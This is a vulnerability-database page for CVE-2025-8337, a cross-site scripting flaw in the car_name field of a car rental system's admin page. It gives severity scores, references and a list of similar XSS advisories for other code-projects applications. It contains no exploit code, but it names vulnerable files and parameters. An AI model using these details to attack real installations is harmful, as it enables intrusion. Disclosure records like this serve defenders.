Logo
-

Byte Open Security

(ByteOS Network)

Log In

Sign Up

ByteOS

Security
Vulnerability Details
Registries
Custom Views
Weaknesses
Attack Patterns
Filters & Tools
Vulnerability Details :

CVE-2025-8337

Summary
Assigner-VulDB
Assigner Org ID-1af790b2-7ee1-4545-860a-a788eba489b5
Published At-30 Jul, 2025 | 23:02
Updated At-31 Jul, 2025 | 14:34
Rejected At-
Credits

code-projects Simple Car Rental System add_vehicles.php cross site scripting

A vulnerability, which was classified as problematic, has been found in code-projects Simple Car Rental System 1.0. This issue affects some unknown processing of the file /admin/add_vehicles.php. The manipulation of the argument car_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

Vendors
-
Not available
Products
-
Metrics (CVSS)
VersionBase scoreBase severityVector
Weaknesses
Attack Patterns
Solution/Workaround
References
HyperlinkResource Type
EPSS History
Score
Latest Score
-
N/A
No data available for selected date range
Percentile
Latest Percentile
-
N/A
No data available for selected date range
Stakeholder-Specific Vulnerability Categorization (SSVC)
▼Common Vulnerabilities and Exposures (CVE)
cve.org
Assigner:VulDB
Assigner Org ID:1af790b2-7ee1-4545-860a-a788eba489b5
Published At:30 Jul, 2025 | 23:02
Updated At:31 Jul, 2025 | 14:34
Rejected At:
▼CVE Numbering Authority (CNA)
code-projects Simple Car Rental System add_vehicles.php cross site scripting

A vulnerability, which was classified as problematic, has been found in code-projects Simple Car Rental System 1.0. This issue affects some unknown processing of the file /admin/add_vehicles.php. The manipulation of the argument car_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

Affected Products
Vendor
Source Code & Projectscode-projects
Product
Simple Car Rental System
Versions
Affected
  • 1.0
Problem Types
TypeCWE IDDescription
CWECWE-79Cross Site Scripting
CWECWE-94Code Injection
Type: CWE
CWE ID: CWE-79
Description: Cross Site Scripting
Type: CWE
CWE ID: CWE-94
Description: Code Injection
Metrics
VersionBase scoreBase severityVector
4.04.8MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
3.12.4LOW
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
3.02.4LOW
CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
2.03.3N/A
AV:N/AC:L/Au:M/C:N/I:P/A:N/E:POC/RL:ND/RC:UR
Version: 4.0
Base score: 4.8
Base severity: MEDIUM
Vector:
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
Version: 3.1
Base score: 2.4
Base severity: LOW
Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
Version: 3.0
Base score: 2.4
Base severity: LOW
Vector:
CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R
Version: 2.0
Base score: 3.3
Base severity: N/A
Vector:
AV:N/AC:L/Au:M/C:N/I:P/A:N/E:POC/RL:ND/RC:UR
Metrics Other Info
Impacts
CAPEC IDDescription
Solutions
Configurations
Workarounds
Exploits
Credits
reporter
iC0rner (VulDB User)
Timeline
EventDate
Advisory disclosed2025-07-30 00:00:00
VulDB entry created2025-07-30 02:00:00
VulDB entry last update2025-07-30 10:29:39
Event: Advisory disclosed
Date: 2025-07-30 00:00:00
Event: VulDB entry created
Date: 2025-07-30 02:00:00
Event: VulDB entry last update
Date: 2025-07-30 10:29:39
Replaced By
Rejected Reason
References
HyperlinkResource
https://vuldb.com/?id.318287
vdb-entry
technical-description
https://vuldb.com/?ctiid.318287
signature
permissions-required
https://vuldb.com/?submit.624187
third-party-advisory
https://github.com/i-Corner/cve/issues/13
exploit
issue-tracking
https://code-projects.org/
product
Hyperlink: https://vuldb.com/?id.318287
Resource:
vdb-entry
technical-description
Hyperlink: https://vuldb.com/?ctiid.318287
Resource:
signature
permissions-required
Hyperlink: https://vuldb.com/?submit.624187
Resource:
third-party-advisory
Hyperlink: https://github.com/i-Corner/cve/issues/13
Resource:
exploit
issue-tracking
Hyperlink: https://code-projects.org/
Resource:
product
▼Authorized Data Publishers (ADP)
CISA ADP Vulnrichment
Affected Products
Metrics
VersionBase scoreBase severityVector
Metrics Other Info
Impacts
CAPEC IDDescription
Solutions
Configurations
Workarounds
Exploits
Credits
Timeline
EventDate
Replaced By
Rejected Reason
References
HyperlinkResource
https://github.com/i-Corner/cve/issues/13
exploit
Hyperlink: https://github.com/i-Corner/cve/issues/13
Resource:
exploit
Information is not available yet
▼National Vulnerability Database (NVD)
nvd.nist.gov
Source:cna@vuldb.com
Published At:30 Jul, 2025 | 23:15
Updated At:05 Aug, 2025 | 20:36

A vulnerability, which was classified as problematic, has been found in code-projects Simple Car Rental System 1.0. This issue affects some unknown processing of the file /admin/add_vehicles.php. The manipulation of the argument car_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

CISA Catalog
Date AddedDue DateVulnerability NameRequired Action
N/A
Date Added: N/A
Due Date: N/A
Vulnerability Name: N/A
Required Action: N/A
Metrics
TypeVersionBase scoreBase severityVector
Secondary4.04.8MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Secondary3.12.4LOW
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
Primary3.15.4MEDIUM
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Secondary2.03.3LOW
AV:N/AC:L/Au:M/C:N/I:P/A:N
Type: Secondary
Version: 4.0
Base score: 4.8
Base severity: MEDIUM
Vector:
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Type: Secondary
Version: 3.1
Base score: 2.4
Base severity: LOW
Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
Type: Primary
Version: 3.1
Base score: 5.4
Base severity: MEDIUM
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Type: Secondary
Version: 2.0
Base score: 3.3
Base severity: LOW
Vector:
AV:N/AC:L/Au:M/C:N/I:P/A:N
CPE Matches
Source Code & Projects
code-projects
>>simple_car_rental_system>>1.0
cpe:2.3:a:code-projects:simple_car_rental_system:1.0:*:*:*:*:*:*:*
Weaknesses
CWE IDTypeSource
CWE-79Secondarycna@vuldb.com
CWE-94Secondarycna@vuldb.com
CWE ID: CWE-79
Type: Secondary
Source: cna@vuldb.com
CWE ID: CWE-94
Type: Secondary
Source: cna@vuldb.com
Evaluator Description
Evaluator Impact

Evaluator Solution

Vendor Statements
References
HyperlinkSourceResource
https://code-projects.org/cna@vuldb.com
Product
https://github.com/i-Corner/cve/issues/13cna@vuldb.com
Exploit
Issue Tracking
Third Party Advisory
https://vuldb.com/?ctiid.318287cna@vuldb.com
Permissions Required
VDB Entry
https://vuldb.com/?id.318287cna@vuldb.com
Third Party Advisory
VDB Entry
https://vuldb.com/?submit.624187cna@vuldb.com
Third Party Advisory
VDB Entry
https://github.com/i-Corner/cve/issues/13134c704f-9b21-4f2e-91b3-4a467353bcc0
Exploit
Issue Tracking
Third Party Advisory
Hyperlink: https://code-projects.org/
Source: cna@vuldb.com
Resource:
Product
Hyperlink: https://github.com/i-Corner/cve/issues/13
Source: cna@vuldb.com
Resource:
Exploit
Issue Tracking
Third Party Advisory
Hyperlink: https://vuldb.com/?ctiid.318287
Source: cna@vuldb.com
Resource:
Permissions Required
VDB Entry
Hyperlink: https://vuldb.com/?id.318287
Source: cna@vuldb.com
Resource:
Third Party Advisory
VDB Entry
Hyperlink: https://vuldb.com/?submit.624187
Source: cna@vuldb.com
Resource:
Third Party Advisory
VDB Entry
Hyperlink: https://github.com/i-Corner/cve/issues/13
Source: 134c704f-9b21-4f2e-91b3-4a467353bcc0
Resource:
Exploit
Issue Tracking
Third Party Advisory

Change History

0
Information is not available yet

Similar CVEs

10961Records found
CVE-2025-8167
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.30% / 21.28%
||
7 Day CHG~0.00%
Published-25 Jul, 2025 | 19:32
Updated-05 Aug, 2025 | 21:04
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Church Donation System edit_members.php cross site scripting

A vulnerability was found in code-projects Church Donation System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/edit_members.php. The manipulation of the argument fname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.

Action-Not Available
Vendor-carmeloSource Code & Projects
Product-church_donation_systemChurch Donation System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-7951
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.31% / 22.95%
||
7 Day CHG+0.02%
Published-22 Jul, 2025 | 02:32
Updated-29 Jul, 2025 | 20:43
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Public Chat Room send_message.php cross site scripting

A vulnerability classified as problematic has been found in code-projects Public Chat Room 1.0. This affects an unknown part of the file /send_message.php. The manipulation of the argument chat_msg/your_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Fabian RosSource Code & Projects
Product-public_chat_roomPublic Chat Room
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-8501
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.34% / 25.62%
||
7 Day CHG~0.00%
Published-03 Aug, 2025 | 06:02
Updated-23 Oct, 2025 | 20:06
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Human Resource Integrated System action.php cross site scripting

A vulnerability classified as problematic has been found in code-projects Human Resource Integrated System 1.0. Affected is an unknown function of the file /insert-and-view/action.php. The manipulation of the argument content leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Fabian RosSource Code & Projects
Product-human_resource_integrated_systemHuman Resource Integrated System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-1955
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.33% / 24.62%
||
7 Day CHG~0.00%
Published-04 Mar, 2025 | 21:00
Updated-21 May, 2025 | 15:37
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Online Class and Exam Scheduling System profile.php cross site scripting

A vulnerability was found in code-projects Online Class and Exam Scheduling System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /Scheduling/scheduling/pages/profile.php. The manipulation of the argument username leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-online_class_and_exam_scheduling_systemOnline Class and Exam Scheduling System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-5835
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.21% / 10.62%
||
7 Day CHG~0.00%
Published-09 Apr, 2026 | 02:45
Updated-24 Apr, 2026 | 18:03
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Online Shoe Store admin_football.php cross site scripting

A flaw has been found in code-projects Online Shoe Store 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/admin_football.php. Executing a manipulation of the argument product_name can lead to cross site scripting. It is possible to launch the attack remotely. The exploit has been published and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-Online Shoe Store
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-5834
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.21% / 10.62%
||
7 Day CHG~0.00%
Published-09 Apr, 2026 | 02:30
Updated-24 Apr, 2026 | 18:03
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Online Shoe Store admin_running.php cross site scripting

A vulnerability was detected in code-projects Online Shoe Store 1.0. Affected is an unknown function of the file /admin/admin_running.php. Performing a manipulation of the argument product_name results in cross site scripting. It is possible to initiate the attack remotely. The exploit is now public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-Online Shoe Store
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-7090
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.25% / 16.38%
||
7 Day CHG~0.00%
Published-27 Apr, 2026 | 05:15
Updated-27 Apr, 2026 | 12:06
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Chat System send_message.php cross site scripting

A vulnerability was detected in code-projects Chat System 1.0. This affects an unknown function of the file /admin/send_message.php of the component Chat Interface. The manipulation of the argument msg results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-Chat System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-6778
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.32% / 24.04%
||
7 Day CHG~0.00%
Published-27 Jun, 2025 | 20:31
Updated-11 Jul, 2025 | 15:54
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Food Distributor Site save_settings.php cross site scripting

A vulnerability, which was classified as problematic, was found in code-projects Food Distributor Site 1.0. Affected is an unknown function of the file /admin/save_settings.php. The manipulation of the argument site_phone/site_email/address leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & ProjectsFabian Ros
Product-food_distributor_siteFood Distributor Site
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-4972
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.20% / 10.10%
||
7 Day CHG~0.00%
Published-27 Mar, 2026 | 19:15
Updated-24 Apr, 2026 | 16:36
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Online Reviewer System btn_functions.php cross site scripting

A security vulnerability has been detected in code-projects Online Reviewer System up to 1.0. Affected is an unknown function of the file /system/system/students/assessments/databank/btn_functions.php. Such manipulation of the argument Description leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-Online Reviewer System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-4899
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.29% / 20.86%
||
7 Day CHG~0.00%
Published-26 Mar, 2026 | 21:56
Updated-24 Apr, 2026 | 16:35
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Online Food Ordering System food.php cross site scripting

A security flaw has been discovered in code-projects Online Food Ordering System 1.0. Affected by this issue is some unknown functionality of the file /dbfood/food.php. The manipulation of the argument cuisines results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.

Action-Not Available
Vendor-Source Code & Projects
Product-Online Food Ordering System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-4577
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.21% / 10.65%
||
7 Day CHG~0.00%
Published-23 Mar, 2026 | 06:35
Updated-24 Apr, 2026 | 16:32
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Exam Form Submission update_s4.php cross site scripting

A vulnerability was found in code-projects Exam Form Submission 1.0. The affected element is an unknown function of the file /admin/update_s4.php. Performing a manipulation of the argument sname results in cross site scripting. The attack may be initiated remotely. The exploit has been made public and could be used.

Action-Not Available
Vendor-Source Code & Projects
Product-Exam Form Submission
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-4575
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.21% / 10.62%
||
7 Day CHG~0.00%
Published-23 Mar, 2026 | 05:36
Updated-24 Apr, 2026 | 16:32
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Exam Form Submission update_s2.php cross site scripting

A flaw has been found in code-projects Exam Form Submission 1.0. This issue affects some unknown processing of the file /admin/update_s2.php. This manipulation of the argument sname causes cross site scripting. The attack can be initiated remotely. The exploit has been published and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-Exam Form Submission
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2026-5836
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-4.8||MEDIUM
EPSS-0.21% / 10.62%
||
7 Day CHG~0.00%
Published-09 Apr, 2026 | 03:00
Updated-24 Apr, 2026 | 18:03
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Online Shoe Store admin_product.php cross site scripting

A vulnerability has been found in code-projects Online Shoe Store 1.0. Affected by this issue is some unknown functionality of the file /admin/admin_product.php. The manipulation of the argument product_name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & Projects
Product-Online Shoe Store
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2024-12983
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.52% / 39.78%
||
7 Day CHG~0.00%
Published-27 Dec, 2024 | 06:31
Updated-23 Oct, 2025 | 20:06
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Hospital Management System Edit Doctor Details Page manage-doctors.php cross site scripting

A vulnerability classified as problematic has been found in code-projects Hospital Management System 1.0. This affects an unknown part of the file /hospital/hms/admin/manage-doctors.php of the component Edit Doctor Details Page. The manipulation of the argument Doctor Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.

Action-Not Available
Vendor-Fabian RosSource Code & Projects
Product-hospital_management_systemHospital Management System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-1195
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.31% / 22.89%
||
7 Day CHG+0.01%
Published-12 Feb, 2025 | 11:31
Updated-20 Feb, 2025 | 20:37
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Real Estate Property Management System EditCategory cross site scripting

A vulnerability, which was classified as problematic, has been found in code-projects Real Estate Property Management System 1.0. This issue affects some unknown processing of the file /Admin/EditCategory. The manipulation of the argument CategoryId leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & ProjectsFabian Ros
Product-real_estate_property_management_systemReal Estate Property Management System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-1170
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.36% / 27.39%
||
7 Day CHG~0.00%
Published-11 Feb, 2025 | 03:00
Updated-03 Mar, 2025 | 16:25
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Real Estate Property Management System Category.php cross site scripting

A vulnerability classified as problematic has been found in code-projects Real Estate Property Management System 1.0. Affected is an unknown function of the file /Admin/Category.php. The manipulation of the argument Desc leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-Source Code & ProjectsFabian Ros
Product-real_estate_property_management_systemReal Estate Property Management System
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2024-12000
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.42% / 33.21%
||
7 Day CHG-0.00%
Published-30 Nov, 2024 | 12:00
Updated-10 Dec, 2024 | 23:16
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Blood Bank System Setting updatesettings.php cross site scripting

A vulnerability was found in code-projects Blood Bank System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /controllers/updatesettings.php of the component Setting Handler. The manipulation of the argument firstname leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.

Action-Not Available
Vendor-Source Code & Projects
Product-blood_bank_systemBlood Bank Systemblood_bank_system
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2024-11660
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.56% / 41.99%
||
7 Day CHG+0.01%
Published-25 Nov, 2024 | 07:00
Updated-04 Dec, 2024 | 17:49
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Farmacia usuario.php cross site scripting

A vulnerability was found in code-projects Farmacia 1.0. It has been classified as problematic. This affects an unknown part of the file usuario.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.

Action-Not Available
Vendor-anishaSource Code & Projects
Product-farmaciaFarmaciafarmacia
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2024-11997
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.39% / 31.19%
||
7 Day CHG-0.00%
Published-30 Nov, 2024 | 08:00
Updated-05 Dec, 2024 | 16:09
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Farmacia vendas.php cross site scripting

A vulnerability was found in code-projects Farmacia 1.0. It has been classified as problematic. This affects an unknown part of the file /vendas.php. The manipulation of the argument notaFiscal leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

Action-Not Available
Vendor-anishaSource Code & Projects
Product-farmaciaFarmaciafarmacia
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2024-12359
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.37% / 28.81%
||
7 Day CHG~0.00%
Published-09 Dec, 2024 | 05:00
Updated-10 Dec, 2024 | 23:34
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Admin Dashboard vendor_management.php cross site scripting

A vulnerability was found in code-projects Admin Dashboard 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /vendor_management.php. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions contradicting product names.

Action-Not Available
Vendor-Source Code & Projects
Product-admin_dashboardAdmin Dashboardadmin_dashboard
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2024-11820
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.38% / 29.34%
||
7 Day CHG+0.01%
Published-27 Nov, 2024 | 00:00
Updated-03 Dec, 2024 | 14:54
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Crud Operation System add.php cross site scripting

A vulnerability, which was classified as problematic, has been found in code-projects Crud Operation System 1.0. This issue affects some unknown processing of the file /add.php. The manipulation of the argument saddress leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.

Action-Not Available
Vendor-Source Code & Projects
Product-crud_operation_systemCrud Operation Systemcrud_operation_system
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2024-12001
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.3||MEDIUM
EPSS-0.42% / 33.21%
||
7 Day CHG-0.00%
Published-30 Nov, 2024 | 12:31
Updated-10 Dec, 2024 | 23:16
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Wazifa System Setting updatesettings.php cross site scripting

A vulnerability classified as problematic has been found in code-projects Wazifa System 1.0. Affected is an unknown function of the file /controllers/updatesettings.php of the component Setting Handler. The manipulation of the argument firstname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.

Action-Not Available
Vendor-anishaSource Code & Projects
Product-wazifa_systemWazifa Systemwazifa_system
CWE ID-CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE ID-CWE-94
Improper Control of Generation of Code ('Code Injection')
CVE-2025-10837
Matching Score-10
Assigner-VulDB
ShareView Details
Matching Score-10
Assigner-VulDB
CVSS Score-5.1||MEDIUM
EPSS-0.22% / 12.18%
||
7 Day CHG+0.01%
Published-23 Sep, 2025 | 04:02
Updated-25 Sep, 2025 | 16:15
Rejected-Not Available
Known To Be Used In Ransomware Campaigns?-Not Available
KEV Added-Not Available
KEV Action Due Date-Not Available
code-projects Simple Food Ordering System order.php cross site scripting

A security vulnerability has been detected in code-projects Simple Food Ordering System 1.0. Affected by this vulnerability is an unknown functionality of the file /ordersimple/order.php. The manipulation of the argument ID leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.

Action-Not Available
Vendor-Fabian RosSource Code & Projects
Product-simple_food_ordering_systemSimple Food Ordering System
CWE ID-CWE-79
